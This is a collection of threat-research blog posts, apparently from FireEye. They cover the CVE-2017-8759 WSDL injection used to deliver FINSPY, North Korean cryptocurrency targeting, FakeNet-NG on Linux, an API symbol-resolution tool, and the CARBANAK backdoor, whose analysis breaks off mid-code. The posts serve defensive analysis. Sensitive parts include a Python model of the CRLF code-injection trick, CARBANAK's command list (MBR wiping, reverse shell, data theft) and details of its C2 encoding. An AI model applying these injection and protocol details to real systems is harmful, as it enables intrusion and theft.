FireEye detection technologies observed this campaign activity between July 18 and Aug. 17, 2017 (Figure 13). Much of the activity was observed in South Korea and the United States (Figure 14), with the Manufacturing industry vertical being the most impacted (Figure 15).

Figure 13: Archive campaign malicious activity by date

Figure 14: Top 10 countries affected by the Archive campaign

Figure 15: Top 10 industry verticals affected by the Archive campaign 


While FormBook is not unique in either its functionality or distribution mechanisms, its relative ease of use, affordable pricing structure, and open availability make it an attractive option for cyber criminals of varying skill levels. In the last few weeks, FormBook was seen downloading other malware families such as NanoCore. The credentials and other data harvested by successful FormBook infections could be used for additional cyber crime activities including, but not limited to: identity theft, continued phishing operations, bank fraud, and extortion.

FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY

FireEye recently detected a malicious Microsoft Office RTF document that leveraged CVE-2017-8759, a SOAP WSDL parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. Mandiant analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.

FireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found here.

FireEye email, endpoint and network products detected the malicious documents.

Vulnerability Used to Target Russian Speakers

The malicious document, “Проект.doc” (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).

FINSPY malware, also reported as FinFisher or WingBird, is available for purchase as part of a “lawful intercept” capability. Based on this and previous use of FINSPY, we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional detections by FireEye’s Dynamic Threat Intelligence system indicate that related activity, though potentially for a different client, may have occurred as early as July 2017.

CVE-2017-8759 WSDL Parser Code Injection

A code injection vulnerability exists in the WSDL parser module, within the PrintClientProxy method (System.Runtime.Remoting/metadata/wsdlparser.cs, line 6111). The IsValidUrl method does not perform correct validation when the provided data contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.

Figure 1: Vulnerable WSDL Parser

When multiple address definitions are provided in a SOAP response, the code inserts the string “//base.ConfigureProxy(this.GetType(),” after the first address, commenting out the remaining addresses. However, if a CRLF sequence appears in an additional address, the code following the CRLF is not commented out. Figure 2 shows that, due to this lack of CRLF validation, a System.Diagnostics.Process.Start method call is injected. The generated code is compiled by the .NET Framework’s csc.exe and loaded by the Office executables as a DLL.

Figure 2: SOAP definition VS Generated code
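The comment-escape behavior can be modeled in a few lines. The sketch below is a hypothetical reconstruction for illustration, not Microsoft's actual generator; it shows how a CRLF inside an attacker-controlled address leaves injected code outside the "//" comment:

```python
# Simplified, hypothetical model of the vulnerable code generation:
# every address after the first is emitted behind a "//" comment
# on the SAME generated line.
def generate_proxy_line(addresses):
    line = 'this.ConfigureProxy(this.GetType(), "%s"' % addresses[0]
    for extra in addresses[1:]:
        # Intended to comment out any additional addresses:
        line += ');//base.ConfigureProxy(this.GetType(), "%s"' % extra
    return line + ");"

# An attacker-supplied address containing a CRLF escapes the comment,
# leaving injected code on its own, uncommented line:
evil = generate_proxy_line([
    "http://example.test/svc",
    'x";\r\nSystem.Diagnostics.Process.Start("cmd.exe", "/c calc");//',
])
lines = evil.split("\r\n")
# lines[1] begins with the injected Process.Start call, which csc.exe
# would compile and the Office process would then load and run.
```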

The In-the-Wild Attacks

The attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the CVE-2017-0199 documents we previously reported on. The malicious samples contained an embedded SOAP moniker to facilitate exploitation (Figure 3).

Figure 3: SOAP Moniker

The payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. The WSDL parser, implemented in the .NET Framework, parses the content and generates .cs source code in the working directory. The .NET Framework’s csc.exe then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage. Figure 4 shows an example library loaded as a result of exploitation.

Figure 4: DLL loaded

Upon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve an HTA script named “word.db” from the same server. The HTA script removes the source code, compiled DLL, and PDB files from disk, then downloads and executes the FINSPY malware named “left.jpg,” which, in spite of the .jpg extension and “image/jpeg” content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.

Figure 5: Live requests

The malware is placed at %appdata%\Microsoft\Windows\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process creation chain under Process Monitor.

Figure 6: Process Created Chain

The Malware

The “left.jpg” (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine – among other anti-analysis techniques – to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of "WininetStartupMutex0".
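The hash-in-filename check is straightforward to model. The sketch below is an illustration of the idea, not FINSPY's code: it flags a file whose own MD5 appears in its file name, as happens when a sandbox renames a sample to its hash:

```python
import hashlib
import os
import tempfile

def looks_like_renamed_sample(path):
    """Sketch of the described anti-analysis trick: if the file's own
    MD5 appears in its file name, assume an analysis tool renamed the
    sample to its hash."""
    with open(path, "rb") as f:
        digest = hashlib.md5(f.read()).hexdigest()
    return digest in os.path.basename(path).lower()

# Demo: sandboxes commonly store samples as <md5>.<ext>.
workdir = tempfile.mkdtemp()
payload = b"\x4d\x5a fake sample bytes"
md5_name = os.path.join(workdir, hashlib.md5(payload).hexdigest() + ".exe")
plain_name = os.path.join(workdir, "invoice.exe")
for p in (md5_name, plain_name):
    with open(p, "wb") as f:
        f.write(payload)

detected_md5 = looks_like_renamed_sample(md5_name)      # flagged
detected_plain = looks_like_renamed_sample(plain_name)  # not flagged
```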


CVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. These exposures demonstrate the significant resources available to “lawful intercept” companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.

It is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero-day used to distribute FINSPY in April 2017, CVE-2017-0199, was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that the source sold it to additional actors.


Thank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and FireEye iSIGHT Intelligence for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us on this issue.

Why Is North Korea So Interested in Bitcoin?

In 2016 we began observing actors we believe to be North Korean utilizing their intrusion capabilities to conduct cyber crime, targeting banks and the global financial system. This marked a departure from previously observed activity of North Korean actors employing cyber espionage for traditional nation state activities. Yet, given North Korea's position as a pariah nation cut off from much of the global economy – as well as a nation that employs a government bureau to conduct illicit economic activity – this is not all that surprising. With North Korea's tight control of its military and intelligence capabilities, it is likely that this activity was carried out to fund the state or personal coffers of Pyongyang's elite, as international sanctions have constricted the Hermit Kingdom.

Now, we may be witnessing a second wave of this campaign: state-sponsored actors seeking to steal bitcoin and other virtual currencies as a means of evading sanctions and obtaining hard currencies to fund the regime. Since May 2017, Mandiant experts observed North Korean actors target at least three South Korean cryptocurrency exchanges with the suspected intent of stealing funds. The spearphishing we have observed in these cases often targets personal email accounts of employees at digital currency exchanges, frequently using tax-themed lures and deploying malware (PEACHPIT and similar variants) linked to North Korean actors suspected to be responsible for intrusions into global banks in 2016.

Add to that the ties between North Korean operators and a watering hole compromise of a bitcoin news site in 2016, as well as at least one instance of usage of a surreptitious cryptocurrency miner, and we begin to see a picture of North Korean interest in cryptocurrencies, an asset class in which bitcoin alone has increased over 400% since the beginning of this year.

2017 North Korean Activity Against South Korean Cryptocurrency Targets

  • April 22 – Four wallets on Yapizon, a South Korean cryptocurrency exchange, are compromised. (It is worth noting that at least some of the tactics, techniques, and procedures reportedly employed during this compromise differed from those we have observed in subsequent intrusion attempts, and as of yet there are no clear indications of North Korean involvement.)
  • April 26 – The United States announces a strategy of increased economic sanctions against North Korea. Sanctions from the international community could be driving North Korean interest in cryptocurrency, as discussed earlier.
  • Early May – Spearphishing against South Korean Exchange #1 begins.
  • Late May – South Korean Exchange #2 compromised via spearphish.
  • Early June – More suspected North Korean activity targeting unknown victims, believed to be cryptocurrency service providers in South Korea.
  • Early July – South Korean Exchange #3 targeted via spear phishing to personal account.

Benefits to Targeting Cryptocurrencies

While bitcoin and cryptocurrency exchanges may seem like odd targets for nation-state actors interested in funding state coffers, some of the other illicit endeavors North Korea pursues further demonstrate an interest in conducting financial crime on the regime’s behalf. North Korea's Office 39 is involved in activities such as gold smuggling, counterfeiting foreign currency, and even operating restaurants. Beyond the focus on the global banking system and cryptocurrency exchanges, a recent report by a South Korean institute noted the involvement of North Korean actors in targeting ATMs with malware, likely by actors supporting, at the very least, similar ends.

If actors compromise an exchange itself (as opposed to an individual account or wallet), they can potentially move cryptocurrencies out of online wallets, swapping them for other, more anonymous cryptocurrencies or sending them directly to other wallets on different exchanges to withdraw them in fiat currencies such as South Korean won, US dollars, or Chinese renminbi. As the regulatory environment around cryptocurrencies is still emerging, some exchanges in different jurisdictions may have lax anti-money-laundering controls, easing this process and making exchanges an attractive target for anyone seeking hard currency.


As bitcoin and other cryptocurrencies have increased in value in the last year, nation states are beginning to take notice. Recently, an advisor to President Putin in Russia announced plans to raise funds to increase Russia's share of bitcoin mining, and senators in Australia's parliament have proposed developing their own national cryptocurrency.

Consequently, it should be no surprise that cryptocurrencies, as an emerging asset class, are becoming a target of interest by a regime that operates in many ways like a criminal enterprise. While at present North Korea is somewhat distinctive in both their willingness to engage in financial crime and their possession of cyber espionage capabilities, the uniqueness of this combination will likely not last long-term as rising cyber powers may see similar potential. Cyber criminals may no longer be the only nefarious actors in this space.

Introducing Linux Support for FakeNet-NG: FLARE’s Next Generation Dynamic Network Analysis Tool


In 2016, FLARE introduced FakeNet-NG, an open-source network analysis tool written in Python. FakeNet-NG allows security analysts to observe and interact with network applications using standard or custom protocols on a single Windows host, which is especially useful for malware analysis and reverse engineering. Since FakeNet-NG’s release, FLARE has added support for additional protocols. FakeNet-NG now has out-of-the-box support for DNS, HTTP (including BITS), FTP, TFTP, IRC, SMTP, POP, TCP, and UDP as well as SSL.

Building on this work, FLARE has now brought FakeNet-NG to Linux. This allows analysts to perform basic dynamic analysis either on a single Linux host or using a separate, dedicated machine in the same way as INetSim. INetSim has made amazing contributions to the productivity of the security community and is still the tool of choice for many analysts. Now, FakeNet-NG gives analysts a cross-platform tool for malware analysis that can directly integrate with all the great Python-based infosec tools that continually emerge in the field.

Getting and Installing FakeNet-NG on Linux

If you are running REMnux, then good news: REMnux now comes with FakeNet-NG installed, and existing users can get it by running the update-remnux command.

For other Linux distributions, setting up and using FakeNet-NG will require the Python pip package manager, the net-tools package, and the development files for OpenSSL, libffi, and libnetfilterqueue. Here is how to quickly obtain the appropriate prerequisites for a few common Linux distributions:

  • Debian and Ubuntu: sudo apt-get install python-pip python-dev libssl-dev libffi-dev libnetfilter-queue-dev net-tools
  • Fedora 25 and CentOS 7: 
    • yum -y update;
    • yum -y install epel-release; # <-- If CentOS
    • yum -y install redhat-rpm-config; # <-- If Fedora
    • yum -y groupinstall 'Development Tools'; yum -y install python-pip python-devel openssl-devel libffi-devel libnetfilter_queue-devel net-tools

Once you have the prerequisites, you can download the latest version of FakeNet-NG and install it using its setup script.

A Tale of Two Modes

On Linux, FakeNet-NG can be deployed in MultiHost mode on a separate host dedicated to network simulation, or in the experimental SingleHost mode for analyzing software locally. Windows only supports SingleHost mode. FakeNet-NG is configured by default to run in NetworkMode: Auto, which will automatically select SingleHost mode on Windows or MultiHost mode on Linux. Table 1 lists the currently supported NetworkMode settings by operating system.





NetworkMode     Windows           Linux
SingleHost      Default (Auto)    Experimental
MultiHost       Unsupported       Default (Auto)

Table 1: FakeNet-NG NetworkMode support per platform

FakeNet-NG’s support for SingleHost mode on Linux currently has limitations.

First, FakeNet-NG does not yet support conditional redirection of specific processes, hosts, or ports on Linux. This means that settings like ProcessWhiteList will not work as expected. We plan to add support for these settings in a later release. In the meantime, SingleHost mode supports redirecting all Internet-bound traffic to local listeners, which is the main use case for malware analysts.

Second, the python-netfilterqueue library is hard-coded to handle datagrams of no more than 4,012 octets in length. Loopback interfaces are commonly configured with a high maximum transmission unit (MTU), which allows certain applications to exceed this hard-coded limit, resulting in unanticipated network behavior. One example of a network application that may exhibit issues as a result is a large file transfer via FTP. A workaround is to recompile python-netfilterqueue with a larger buffer size, or to decrease the MTU for the loopback interface (i.e., lo) to 4,012 or less.
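A quick way to check for this pitfall on an analysis machine is to compare the loopback MTU against the cited limit. A Linux-only Python sketch (the sysfs path is standard; the threshold is the figure from the text):

```python
# Sanity check for the loopback-MTU pitfall described above.
NFQUEUE_DATAGRAM_LIMIT = 4012  # hard-coded limit cited in the text

def loopback_mtu(ifname="lo"):
    # sysfs exposes each interface's MTU on Linux
    with open("/sys/class/net/%s/mtu" % ifname) as f:
        return int(f.read().strip())

def mtu_is_safe(mtu, limit=NFQUEUE_DATAGRAM_LIMIT):
    return mtu <= limit

# Loopback interfaces commonly default to a 65536-byte MTU, which far
# exceeds the hard-coded buffer and can trigger the FTP issue above.
assert not mtu_is_safe(65536)
assert mtu_is_safe(1500)
```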

Configuring FakeNet-NG on Linux

In addition to the new NetworkMode setting, Linux support for FakeNet-NG introduces the following Linux-specific configuration items:

  • LinuxRedirectNonlocal: For MultiHost mode, this setting specifies a comma-delimited list of network interfaces for which to redirect all traffic to the local host so that FakeNet-NG can reply to it. The setting in FakeNet-NG’s default configuration is *, which configures FakeNet-NG to redirect on all interfaces.
  • LinuxFlushIptables: Deletes all iptables rules before adding rules for FakeNet-NG. The original rules are restored as part of FakeNet-NG’s shutdown sequence which is triggered when you hit Ctrl+C. This reduces the likelihood of conflicting, erroneous, or duplicate rules in the event of unexpected termination, and is enabled in FakeNet-NG’s default configuration.
  • LinuxFlushDnsCommand: Specifies the command to flush the DNS resolver cache. When using FakeNet-NG in SingleHost mode on Linux, this ensures that name resolution requests are forwarded to a DNS service such as the FakeNet-NG DNS listener instead of using cached answers. The setting is not applicable on all distributions of Linux, but is populated by default with the correct command for Ubuntu Linux. Refer to your distribution’s documentation for the proper command for this behavior.
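Taken together, these settings appear in FakeNet-NG's INI-style configuration file. The fragment below is illustrative only: the setting names come from the list above, but the section name and the DNS-flush command shown are assumptions rather than shipped defaults.

```ini
[Diverter]
; Auto selects MultiHost mode on Linux, SingleHost on Windows
NetworkMode:           Auto
; Redirect traffic arriving on any interface (the default noted above is *)
LinuxRedirectNonlocal: *
; Flush iptables rules at startup; originals restored on Ctrl+C shutdown
LinuxFlushIptables:    Yes
; Hypothetical value; the correct command varies by distribution
LinuxFlushDnsCommand:  service dns-clean restart
```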

Starting FakeNet-NG on Linux

Before using FakeNet-NG, also be sure to disable any services that may bind to ports corresponding to the FakeNet-NG listeners you plan to use. An example is Ubuntu’s use of a local dnsmasq service. You can use netstat to find such services and should refer to your Linux distribution’s documentation to determine how to disable them.

You can start FakeNet-NG by invoking fakenet with root privileges, as shown in Figure 1.

Figure 1: Starting FakeNet-NG on Linux

You can alter FakeNet-NG’s configuration by either directly editing the file displayed in the first line of FakeNet-NG’s output, or by creating a copy and specifying its location with the -c command-line option.


FakeNet-NG now brings the convenience of a modern, Python-based, malware-oriented network simulation tool to Linux, supporting the full complement of listeners that are available on FakeNet-NG for Windows. Users of REMnux can make use of FakeNet-NG already, while users of other Linux distributions can download and install it using standard package management tools.

Remote Symbol Resolution


The following blog discusses a couple of common techniques that malware uses to obscure its access to the Windows API. In both forms examined, analysts must calculate the API start address and resolve the symbol from the runtime process in order to determine functionality.

After introducing the techniques, we present an open source tool we developed that can be used to resolve addresses from a process running in a virtual machine by an IDA script. This gives us an efficient way to quickly add readability back into the disassembly. 


When performing an analysis, it is very common to see malware try to obscure the API it uses. As a malware analyst, determining which API is used is one of the first things we must resolve in order to determine the capabilities of the code.

Two common obfuscations we are going to look at in this blog are encoded function pointer tables and detours style hook stubs. In both of these scenarios the entry point to the API is not directly visible in the binary.

For an example of what we are talking about, consider the code in Figure 1, which was taken from a memory dump of xdata crypto ransomware sample C6A2FB56239614924E2AB3341B1FBBA5.

Figure 1: API obfuscation code from a crypto ransomware sample

In Figure 1, we see one numeric value being loaded into eax, XORed against another, and then being called as a function pointer. These numbers only make sense in the context of a running process. We can calculate the final number from the values contained in the memory dump, but we also need a way to know which API address it resolved to in this particular running process. We also have to take into account that DLLs can be rebased due to conflicts in preferred base address, and systems with ASLR enabled.
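Decoding such a pointer is trivial once both immediates are recovered from the dump; the hard part, as noted, is mapping the result to a symbol. A sketch with placeholder constants (not the sample's real values):

```python
# The call site computes the real API address only at runtime:
# one constant XORed with another.
def decode_ptr(stored, key):
    return (stored ^ key) & 0xFFFFFFFF  # 32-bit process

encoded_slot = 0x3A1F6D42  # hypothetical value loaded into eax
xor_key      = 0x3A1F0000  # hypothetical second immediate
api_addr = decode_ptr(encoded_slot, xor_key)
# api_addr must still be matched to a symbol name within the context
# of this particular running process -- the problem the tool solves.
```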

Figure 2 shows one other place we can look to see where the values were initially set.

Figure 2: Crypto malware setting obfuscated function pointer from API hash

In this case, the initial value is loaded from an API hash lookup – again not of immediate value. Here we have hit a crossroad, with multiple paths we can take to resolve the problem. We can search for a published hash list, extract the hasher and build our own database, or figure out a way to dynamically resolve the decoded API address.

Before we choose which path to take, let us consider another sample. Figure 3 shows code from Andromeda sample, 3C8B018C238AF045F70B38FC27D0D640.

Figure 3: API redirection code from an Andromeda sample

This code was found in a memory injection. Here we can see what looks to be a detours-style trampoline, where the first instruction was stolen from the actual Windows API and placed in a small stub, with an immediate jump back to the original API + x bytes.

In this situation, the malware accesses all of the API through these stubs and we have no clear resolution as to which stub points where. From the disassembly we can also see that the stolen instructions are of variable length.

In order to resolve where these functions go, we would have to:

  • enumerate all of the stubs
  • calculate how many bytes are in the first instruction
  • extract the jmp address
  • subtract the stolen byte count to find the API entrypoint
  • resolve the calculated address for this specific process instance
  • rename the stub to a meaningful value
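Assuming each stub is the stolen bytes followed by a five-byte E9 rel32 jmp, and that a disassembler (e.g. capstone) supplies the stolen-instruction length, the address arithmetic from the steps above can be sketched in Python:

```python
import struct

def resolve_stub(stub_bytes, stub_va, stolen_len):
    """Recover the true API entry point from one detours-style stub.
    Simplified sketch: assumes <stolen bytes><E9 rel32 jmp> layout."""
    jmp_off = stolen_len
    assert stub_bytes[jmp_off] == 0xE9            # rel32 jmp opcode
    rel32, = struct.unpack_from("<i", stub_bytes, jmp_off + 1)
    jmp_src_end = stub_va + jmp_off + 5           # address after the jmp
    continuation = jmp_src_end + rel32            # original API + stolen_len
    return continuation - stolen_len              # true API entry point

# Hypothetical stub at VA 0x400000: "mov edi, edi" (2 stolen bytes from
# the API prologue), then a jmp to API+2.
api_va, stub_va = 0x76001234, 0x400000
rel = (api_va + 2) - (stub_va + 2 + 5)
stub = bytes([0x8B, 0xFF, 0xE9]) + struct.pack("<i", rel)
resolved = resolve_stub(stub, stub_va, 2)
```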

In this sample, looking for cross references on where the value is set does not yield any results.

Here we have two manifestations of essentially the same problem. How do we best resolve calculated API addresses and add this information back into our IDA database?

One of the first techniques used was to calculate all of the final addresses, write them to a binary file, inject the data into the process, and examine the table in the debugger (Figure 4). Since the debugger already has an API address lookup table, this gives a crude yet quick method to get the information we need.

Figure 4: ApiLogger from iDefense MAP injecting a data file into a process and examining results in debugger

From here we can extract the resolved symbols and write a script to integrate them into our IDB. This works, but it is bulky and involves several steps.

Our Tool

What we really want is to build our own symbol lookup table for a process and create a streamlined way to access it from our scripts.

The first question is: How can we build our own lookup table of API addresses to API names? To resolve this information, we need to follow some steps:

  • enumerate all of the DLLs loaded into a process
  • for each DLL, walk the export table and extract function name and RVA
  • calculate API entrypoint based on DLL base address and export RVA
  • build a lookup table based on all of this information
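The steps above amount to simple arithmetic once each module's exports are parsed. A minimal Python sketch follows, with the export parsing stubbed out and all bases and RVAs invented for illustration; a real implementation would walk each loaded DLL's export directory with a PE-parsing library:

```python
# Stubbed-out "parsed module" data; real code would enumerate loaded
# DLLs and walk their export tables. Values below are made up.
modules = {
    # dll name: (load base, {export name: export RVA})
    "kernel32.dll": (0x76000000, {"CreateFileW": 0x1234, "ReadFile": 0x2210}),
    "ws2_32.dll":   (0x74F00000, {"connect": 0x0AB0}),
}

def build_lookup(mods):
    table = {}
    for dll, (base, exports) in mods.items():
        for name, rva in exports.items():
            table[base + rva] = "%s!%s" % (dll, name)  # VA -> symbol
    return table

lookup = build_lookup(modules)
# e.g. lookup[0x76000000 + 0x1234] -> "kernel32.dll!CreateFileW"
```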

While this sounds like a lot of work, libraries are already available that handle all of the heavy lifting. Figure 5 shows a screenshot of a remote lookup tool we developed for such occasions.

Figure 5: Open source remote lookup application

To maximize the benefits of this type of tool, it must be efficient. What is the best way to interface with this data? There are several factors to consider, including how the data is submitted, which input formats are accepted, and how well the tool integrates with the flow of the analysis process.

The first consideration is how we interface with it. For maximum flexibility, three methods were chosen. Lookups can be submitted:

  • individually via textbox
  • in bulk by file or
  • over the network by a remote client

In terms of input formats, it accepts the following:

  • hex memory address
  • case insensitive API name
  • dll_name@ordinal
  • dll_name.export_name

The tool output is in the form of a CSV list that includes address, name, ordinal, and DLL.

With the base tool capabilities in place, we still need an efficient streamlined way to use it during our analysis. The individual lookups are nice for offhand queries and testing, but not in bulk. The bulk file lookup is nice on occasion, but it still requires data export/import to integrate results with your IDA database.

What is really needed is a way to run a script in IDA, calculate the API address, and then resolve that address inline while running an IDA script. This allows us to rename functions and pointers on the fly as the script runs all in one shot. This is where the network client capability comes in.

Again, there are many approaches to this. Here we chose to integrate a network client into a beta of IDA Jscript (Figure 6). IDA Jscript is an open source IDA scripting tool with IDE that includes syntax highlighting, IntelliSense, function prototype tooltips, and debugger.

Figure 6: Open source IDA Jscript decoding and resolving API addresses

In this example we see a script that decodes the xdata pointer table, resolves the API address over the network, and then generates an IDC script to rename the pointers in IDA.

After running this script and applying the results, the decompiler output becomes plainly readable (Figure 7).

Figure 7: Decompiler output from the xdata sample after symbol resolution

Going back to the Andromeda sample, the API information can be restored with the brief idajs script shown in Figure 8.

Figure 8: small idajs script to remotely resolve and rename Andromeda API hook stubs

For IDAPython users, a python remote lookup client is also available.
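The lookup server's wire protocol is not documented in this post, so the following client is purely illustrative: it assumes a newline-delimited query answered by one CSV row (address, name, ordinal, dll), and pairs the client with a toy stand-in server so the round trip can be exercised:

```python
import socket
import threading

def remote_lookup(query, host, port):
    """Hypothetical network client; the query/reply format is assumed."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall((query + "\n").encode())
        return s.makefile().readline().strip().split(",")

# Toy stand-in server (ordinal value is invented) so the client can be
# exercised end to end without the real tool.
server = socket.socket()
server.bind(("127.0.0.1", 0))
server.listen(1)

def serve_one():
    conn, _ = server.accept()
    q = conn.makefile().readline().strip()
    conn.sendall(("%s,CreateFileW,123,kernel32.dll\n" % q).encode())
    conn.close()

threading.Thread(target=serve_one).start()
row = remote_lookup("0x76001234", "127.0.0.1", server.getsockname()[1])
# row holds [address, name, ordinal, dll]
```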


It is common for malware to use techniques that mask the Windows API being used. These techniques force malware analysts to extract values from runtime data, calculate entry point addresses, and then resolve their meaning within the context of a particular running process.

In previous techniques, several manual stages were involved that were bulky and time intensive.

This blog introduces a small simple open source tool that can integrate well into multiple IDA scripting languages. This combination allows analysts streamlined access to the data required to quickly bypass these types of obfuscations and continue on with their analysis.

We are happy to be able to open source the remote lookup application so that others may benefit and adapt it to their own needs. Sample network clients have been provided for Python, C#, D, and VB6.

Download a copy of the tool today.

Behind the CARBANAK Backdoor

In this blog, we will take a closer look at the powerful, versatile backdoor known as CARBANAK (aka Anunak). Specifically, we will focus on the operational details of its use over the past few years, including its configuration, the minor variations observed from sample to sample, and its evolution. With these details, we will then draw some conclusions about the operators of CARBANAK. For some additional background on the CARBANAK backdoor, see the papers by Kaspersky and Group-IB and Fox-It.

Technical Analysis

Before we dive into the meat of this blog, a brief technical analysis of the backdoor is necessary to provide some context. CARBANAK is a full-featured backdoor with data-stealing capabilities and a plugin architecture. Some of its capabilities include key logging, desktop video capture, VNC, HTTP form grabbing, file system management, file transfer, TCP tunneling, HTTP proxy, OS destruction, POS and Outlook data theft and reverse shell. Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time.

Monitoring Threads

The backdoor may optionally start one or more threads that perform continuous monitoring for various purposes, as described in Table 1.  

  • Key logger: Logs key strokes for configured processes and sends them to the command and control (C2) server
  • Form grabber: Monitors HTTP traffic for form data and sends it to the C2 server
  • POS monitor: Monitors for changes to logs stored in C:\NSB\Coalition\Logs and nsb.pos.client.log and sends parsed data to the C2 server
  • PST monitor: Searches recursively for newly created Outlook personal storage table (PST) files within user directories and sends them to the C2 server
  • HTTP proxy monitor: Monitors HTTP traffic for requests sent to HTTP proxies, and saves the proxy address and credentials for future use
Table 1: Monitoring threads


In addition to its file management capabilities, this data-stealing backdoor supports 34 commands that can be received from the C2 server. After decryption, these 34 commands are plain text with parameters that are space delimited much like a command line. The command and parameter names are hashed before being compared by the binary, making it difficult to recover the original names of commands and parameters. Table 2 lists these commands.

  • Runs each command specified in the configuration file (see the Configuration section)
  • Updates the state value (see the Configuration section)
  • Desktop video recording
  • Downloads executable and injects it into a new process
  • Ammyy Admin tool
  • Updates self
  • Adds/updates klgconfig (analysis incomplete)
  • Starts HTTP proxy
  • Renders the computer unbootable by wiping the MBR
  • Reboots the operating system
  • Creates a network tunnel
  • Adds new C2 server or proxy address for the pseudo-HTTP protocol
  • Adds new C2 server for the custom binary protocol
  • Creates or deletes a Windows user account
  • Enables concurrent RDP (analysis incomplete)
  • Adds Notification Package (analysis incomplete)
  • Deletes a file or service
  • Adds a command to the configuration file (see the Configuration section)
  • Downloads executable and injects it directly into a new process
  • Sends Windows account details to the C2 server
  • Takes a screenshot of the desktop and sends it to the C2 server
  • Sleeps until a specified date
  • Uploads files to the C2 server
  • Runs the VNC plugin
  • Runs a specified executable file
  • Uninstalls the backdoor
  • Returns a list of running processes to the C2 server
  • Changes the C2 protocol used by plugins
  • Downloads and executes shellcode from a specified address
  • Terminates the first process found with a specified name
  • Initiates a reverse shell to the C2 server
  • Plugin control
  • Updates the backdoor
Table 2: Supported Commands


A configuration file resides in a file under the backdoor’s installation directory with the .bin extension. It contains commands in the same form as those listed in Table 2 that are automatically executed by the backdoor when it is started. These commands are also executed when the loadconfig command is issued. This file can be likened to a startup script for the backdoor. The state command sets a global variable containing a series of Boolean values represented as ASCII values ‘0’ or ‘1’ and also adds itself to the configuration file. Some of these values indicate which C2 protocol to use, whether the backdoor has been installed, and whether the PST monitoring thread is running or not. Other than the state command, all commands in the configuration file are identified by their hash’s decimal value instead of their plain text name. Certain commands, when executed, add themselves to the configuration so they will persist across (or be part of) reboots. The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it.
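As a rough illustration of the state value's layout, the following sketch treats it as positional ASCII booleans. The flag names and positions here are invented, since the text identifies only what some of the values indicate:

```python
# Hypothetical flag layout -- names and order are illustrative only.
FLAGS = ["use_binary_protocol", "installed", "pst_monitor_running"]

def parse_state(state_str):
    """Interpret a string of ASCII '0'/'1' characters as named booleans."""
    return {name: ch == "1" for name, ch in zip(FLAGS, state_str)}

state = parse_state("101")
# With this invented layout: binary protocol in use, not yet installed,
# PST monitoring thread running.
```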

Figure 1 and Figure 2 illustrate some sample, decoded configuration files we have come across in our investigations.

Figure 1: Configuration file that adds new C2 server and forces the data-stealing backdoor to use it

Figure 2: Configuration file that adds TCP tunnels and records desktop video

Command and Control

CARBANAK communicates to its C2 servers via pseudo-HTTP or a custom binary protocol.

Pseudo-HTTP Protocol

Messages for the pseudo-HTTP protocol are delimited with the ‘|’ character. A message starts with a host ID composed by concatenating a hash value generated from the computer’s hostname and MAC address to a string likely used as a campaign code. Once the message has been formatted, it is sandwiched between an additional two fields of randomly generated strings of upper and lower case alphabet characters. An example of a command polling message and a response to the listprocess command are given in Figure 3 and Figure 4, respectively.

Figure 3: Example command polling message

Figure 4: Example command response message
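The framing described above can be sketched as follows; the host-ID hash and campaign code values are placeholders, and only the '|' delimiting and the random alphabetic padding on both ends follow the text:

```python
import random
import string

def rand_alpha(lo=4, hi=12):
    # Random run of upper/lower case alphabet characters
    return "".join(random.choice(string.ascii_letters)
                   for _ in range(random.randint(lo, hi)))

def frame_message(host_hash, campaign, body):
    host_id = host_hash + campaign          # hash concatenated to campaign code
    msg = "|".join([host_id, body])
    # Sandwich the message between two random alphabetic fields
    return "|".join([rand_alpha(), msg, rand_alpha()])

framed = frame_message("1BEF0A57", "camp01", "listprocess")
parts = framed.split("|")
# parts: [random pad, host ID, message body, random pad]
```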

Messages are encrypted using Microsoft’s implementation of RC2 in CBC mode with PKCS#5 padding. The encrypted message is then Base64 encoded, replacing all the ‘/’ and ‘+’ characters with the ‘.’ and ‘-’ characters, respectively. The eight-byte initialization vector (IV) is a randomly generated string consisting of upper and lower case alphabet characters. It is prepended to the encrypted and encoded message.
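The post-encryption encoding can be reproduced with the standard library. The RC2-CBC step itself is omitted here; `ciphertext` stands in for already-encrypted bytes:

```python
import base64
import random
import string

def encode_payload(ciphertext, iv):
    """Base64 with '/' -> '.' and '+' -> '-', then the eight-character
    alphabetic IV prepended, per the protocol description above."""
    b64 = base64.b64encode(ciphertext).decode()
    b64 = b64.replace("/", ".").replace("+", "-")
    return iv + b64

iv = "".join(random.choice(string.ascii_letters) for _ in range(8))
# These bytes deliberately Base64-encode to characters containing '+'/'/'
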